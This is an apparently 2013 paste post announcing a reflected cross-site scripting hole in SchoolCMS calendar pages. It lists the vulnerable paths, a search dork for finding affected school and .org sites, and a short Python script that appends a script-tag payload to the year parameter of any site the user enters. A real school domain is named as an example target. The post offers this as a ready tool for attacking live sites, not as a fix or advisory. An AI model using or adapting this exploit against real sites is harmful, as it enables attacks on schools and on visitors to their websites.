SchoolCMS software vulnerable to more XSS.

SUBMITTED BY: Guest

DATE: Sept. 23, 2013, 7:49 p.m.

FORMAT: Text only

SIZE: 1.9 kB

Raw Download

HITS: 1130

Report
  1. SchoolCMS software vulnerable to more XSS.
  3. Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites.
  5. Exploit:
  6. /old_core/cal/month.php?cid=
  7. /old_core/cal/day.php?catid=
  8. /old_core/cal/week.php?catid=
  10. The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you Tongue.
  13. Code: SELECT ALL
  14. #!/usr/bin/python
  15. import sys
  16. import webbrowser
  17. import urllib2
  18.     
  19. print "######################################"
  20. print "#SchoolCMS auto-XSS inject script    #"
  21. print "#Dork: inurl:/old_core/cal/month.php #"
  22. print "#Author: VipVince                    #"
  23. print "#Vendor: http://www.poweritschools.com      #"
  24. print "#                                    #"
  25. print "######################################"
  26.     
  27. print "XSS lies in y=parameter of the URL in the calender. (Year)"
  28. print "After dorking a site, Enter URL like: http://www.oaklandschoolsnj.org"
  29. print "Let the script do the rest Wink"
  31. payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
  32. site = raw_input('Enter site to XSS: ')
  33. inject = webbrowser.open(site+payload)
  34. raw_input("Press any key to exit ")
  36. Enjoy
comments powered by Disqus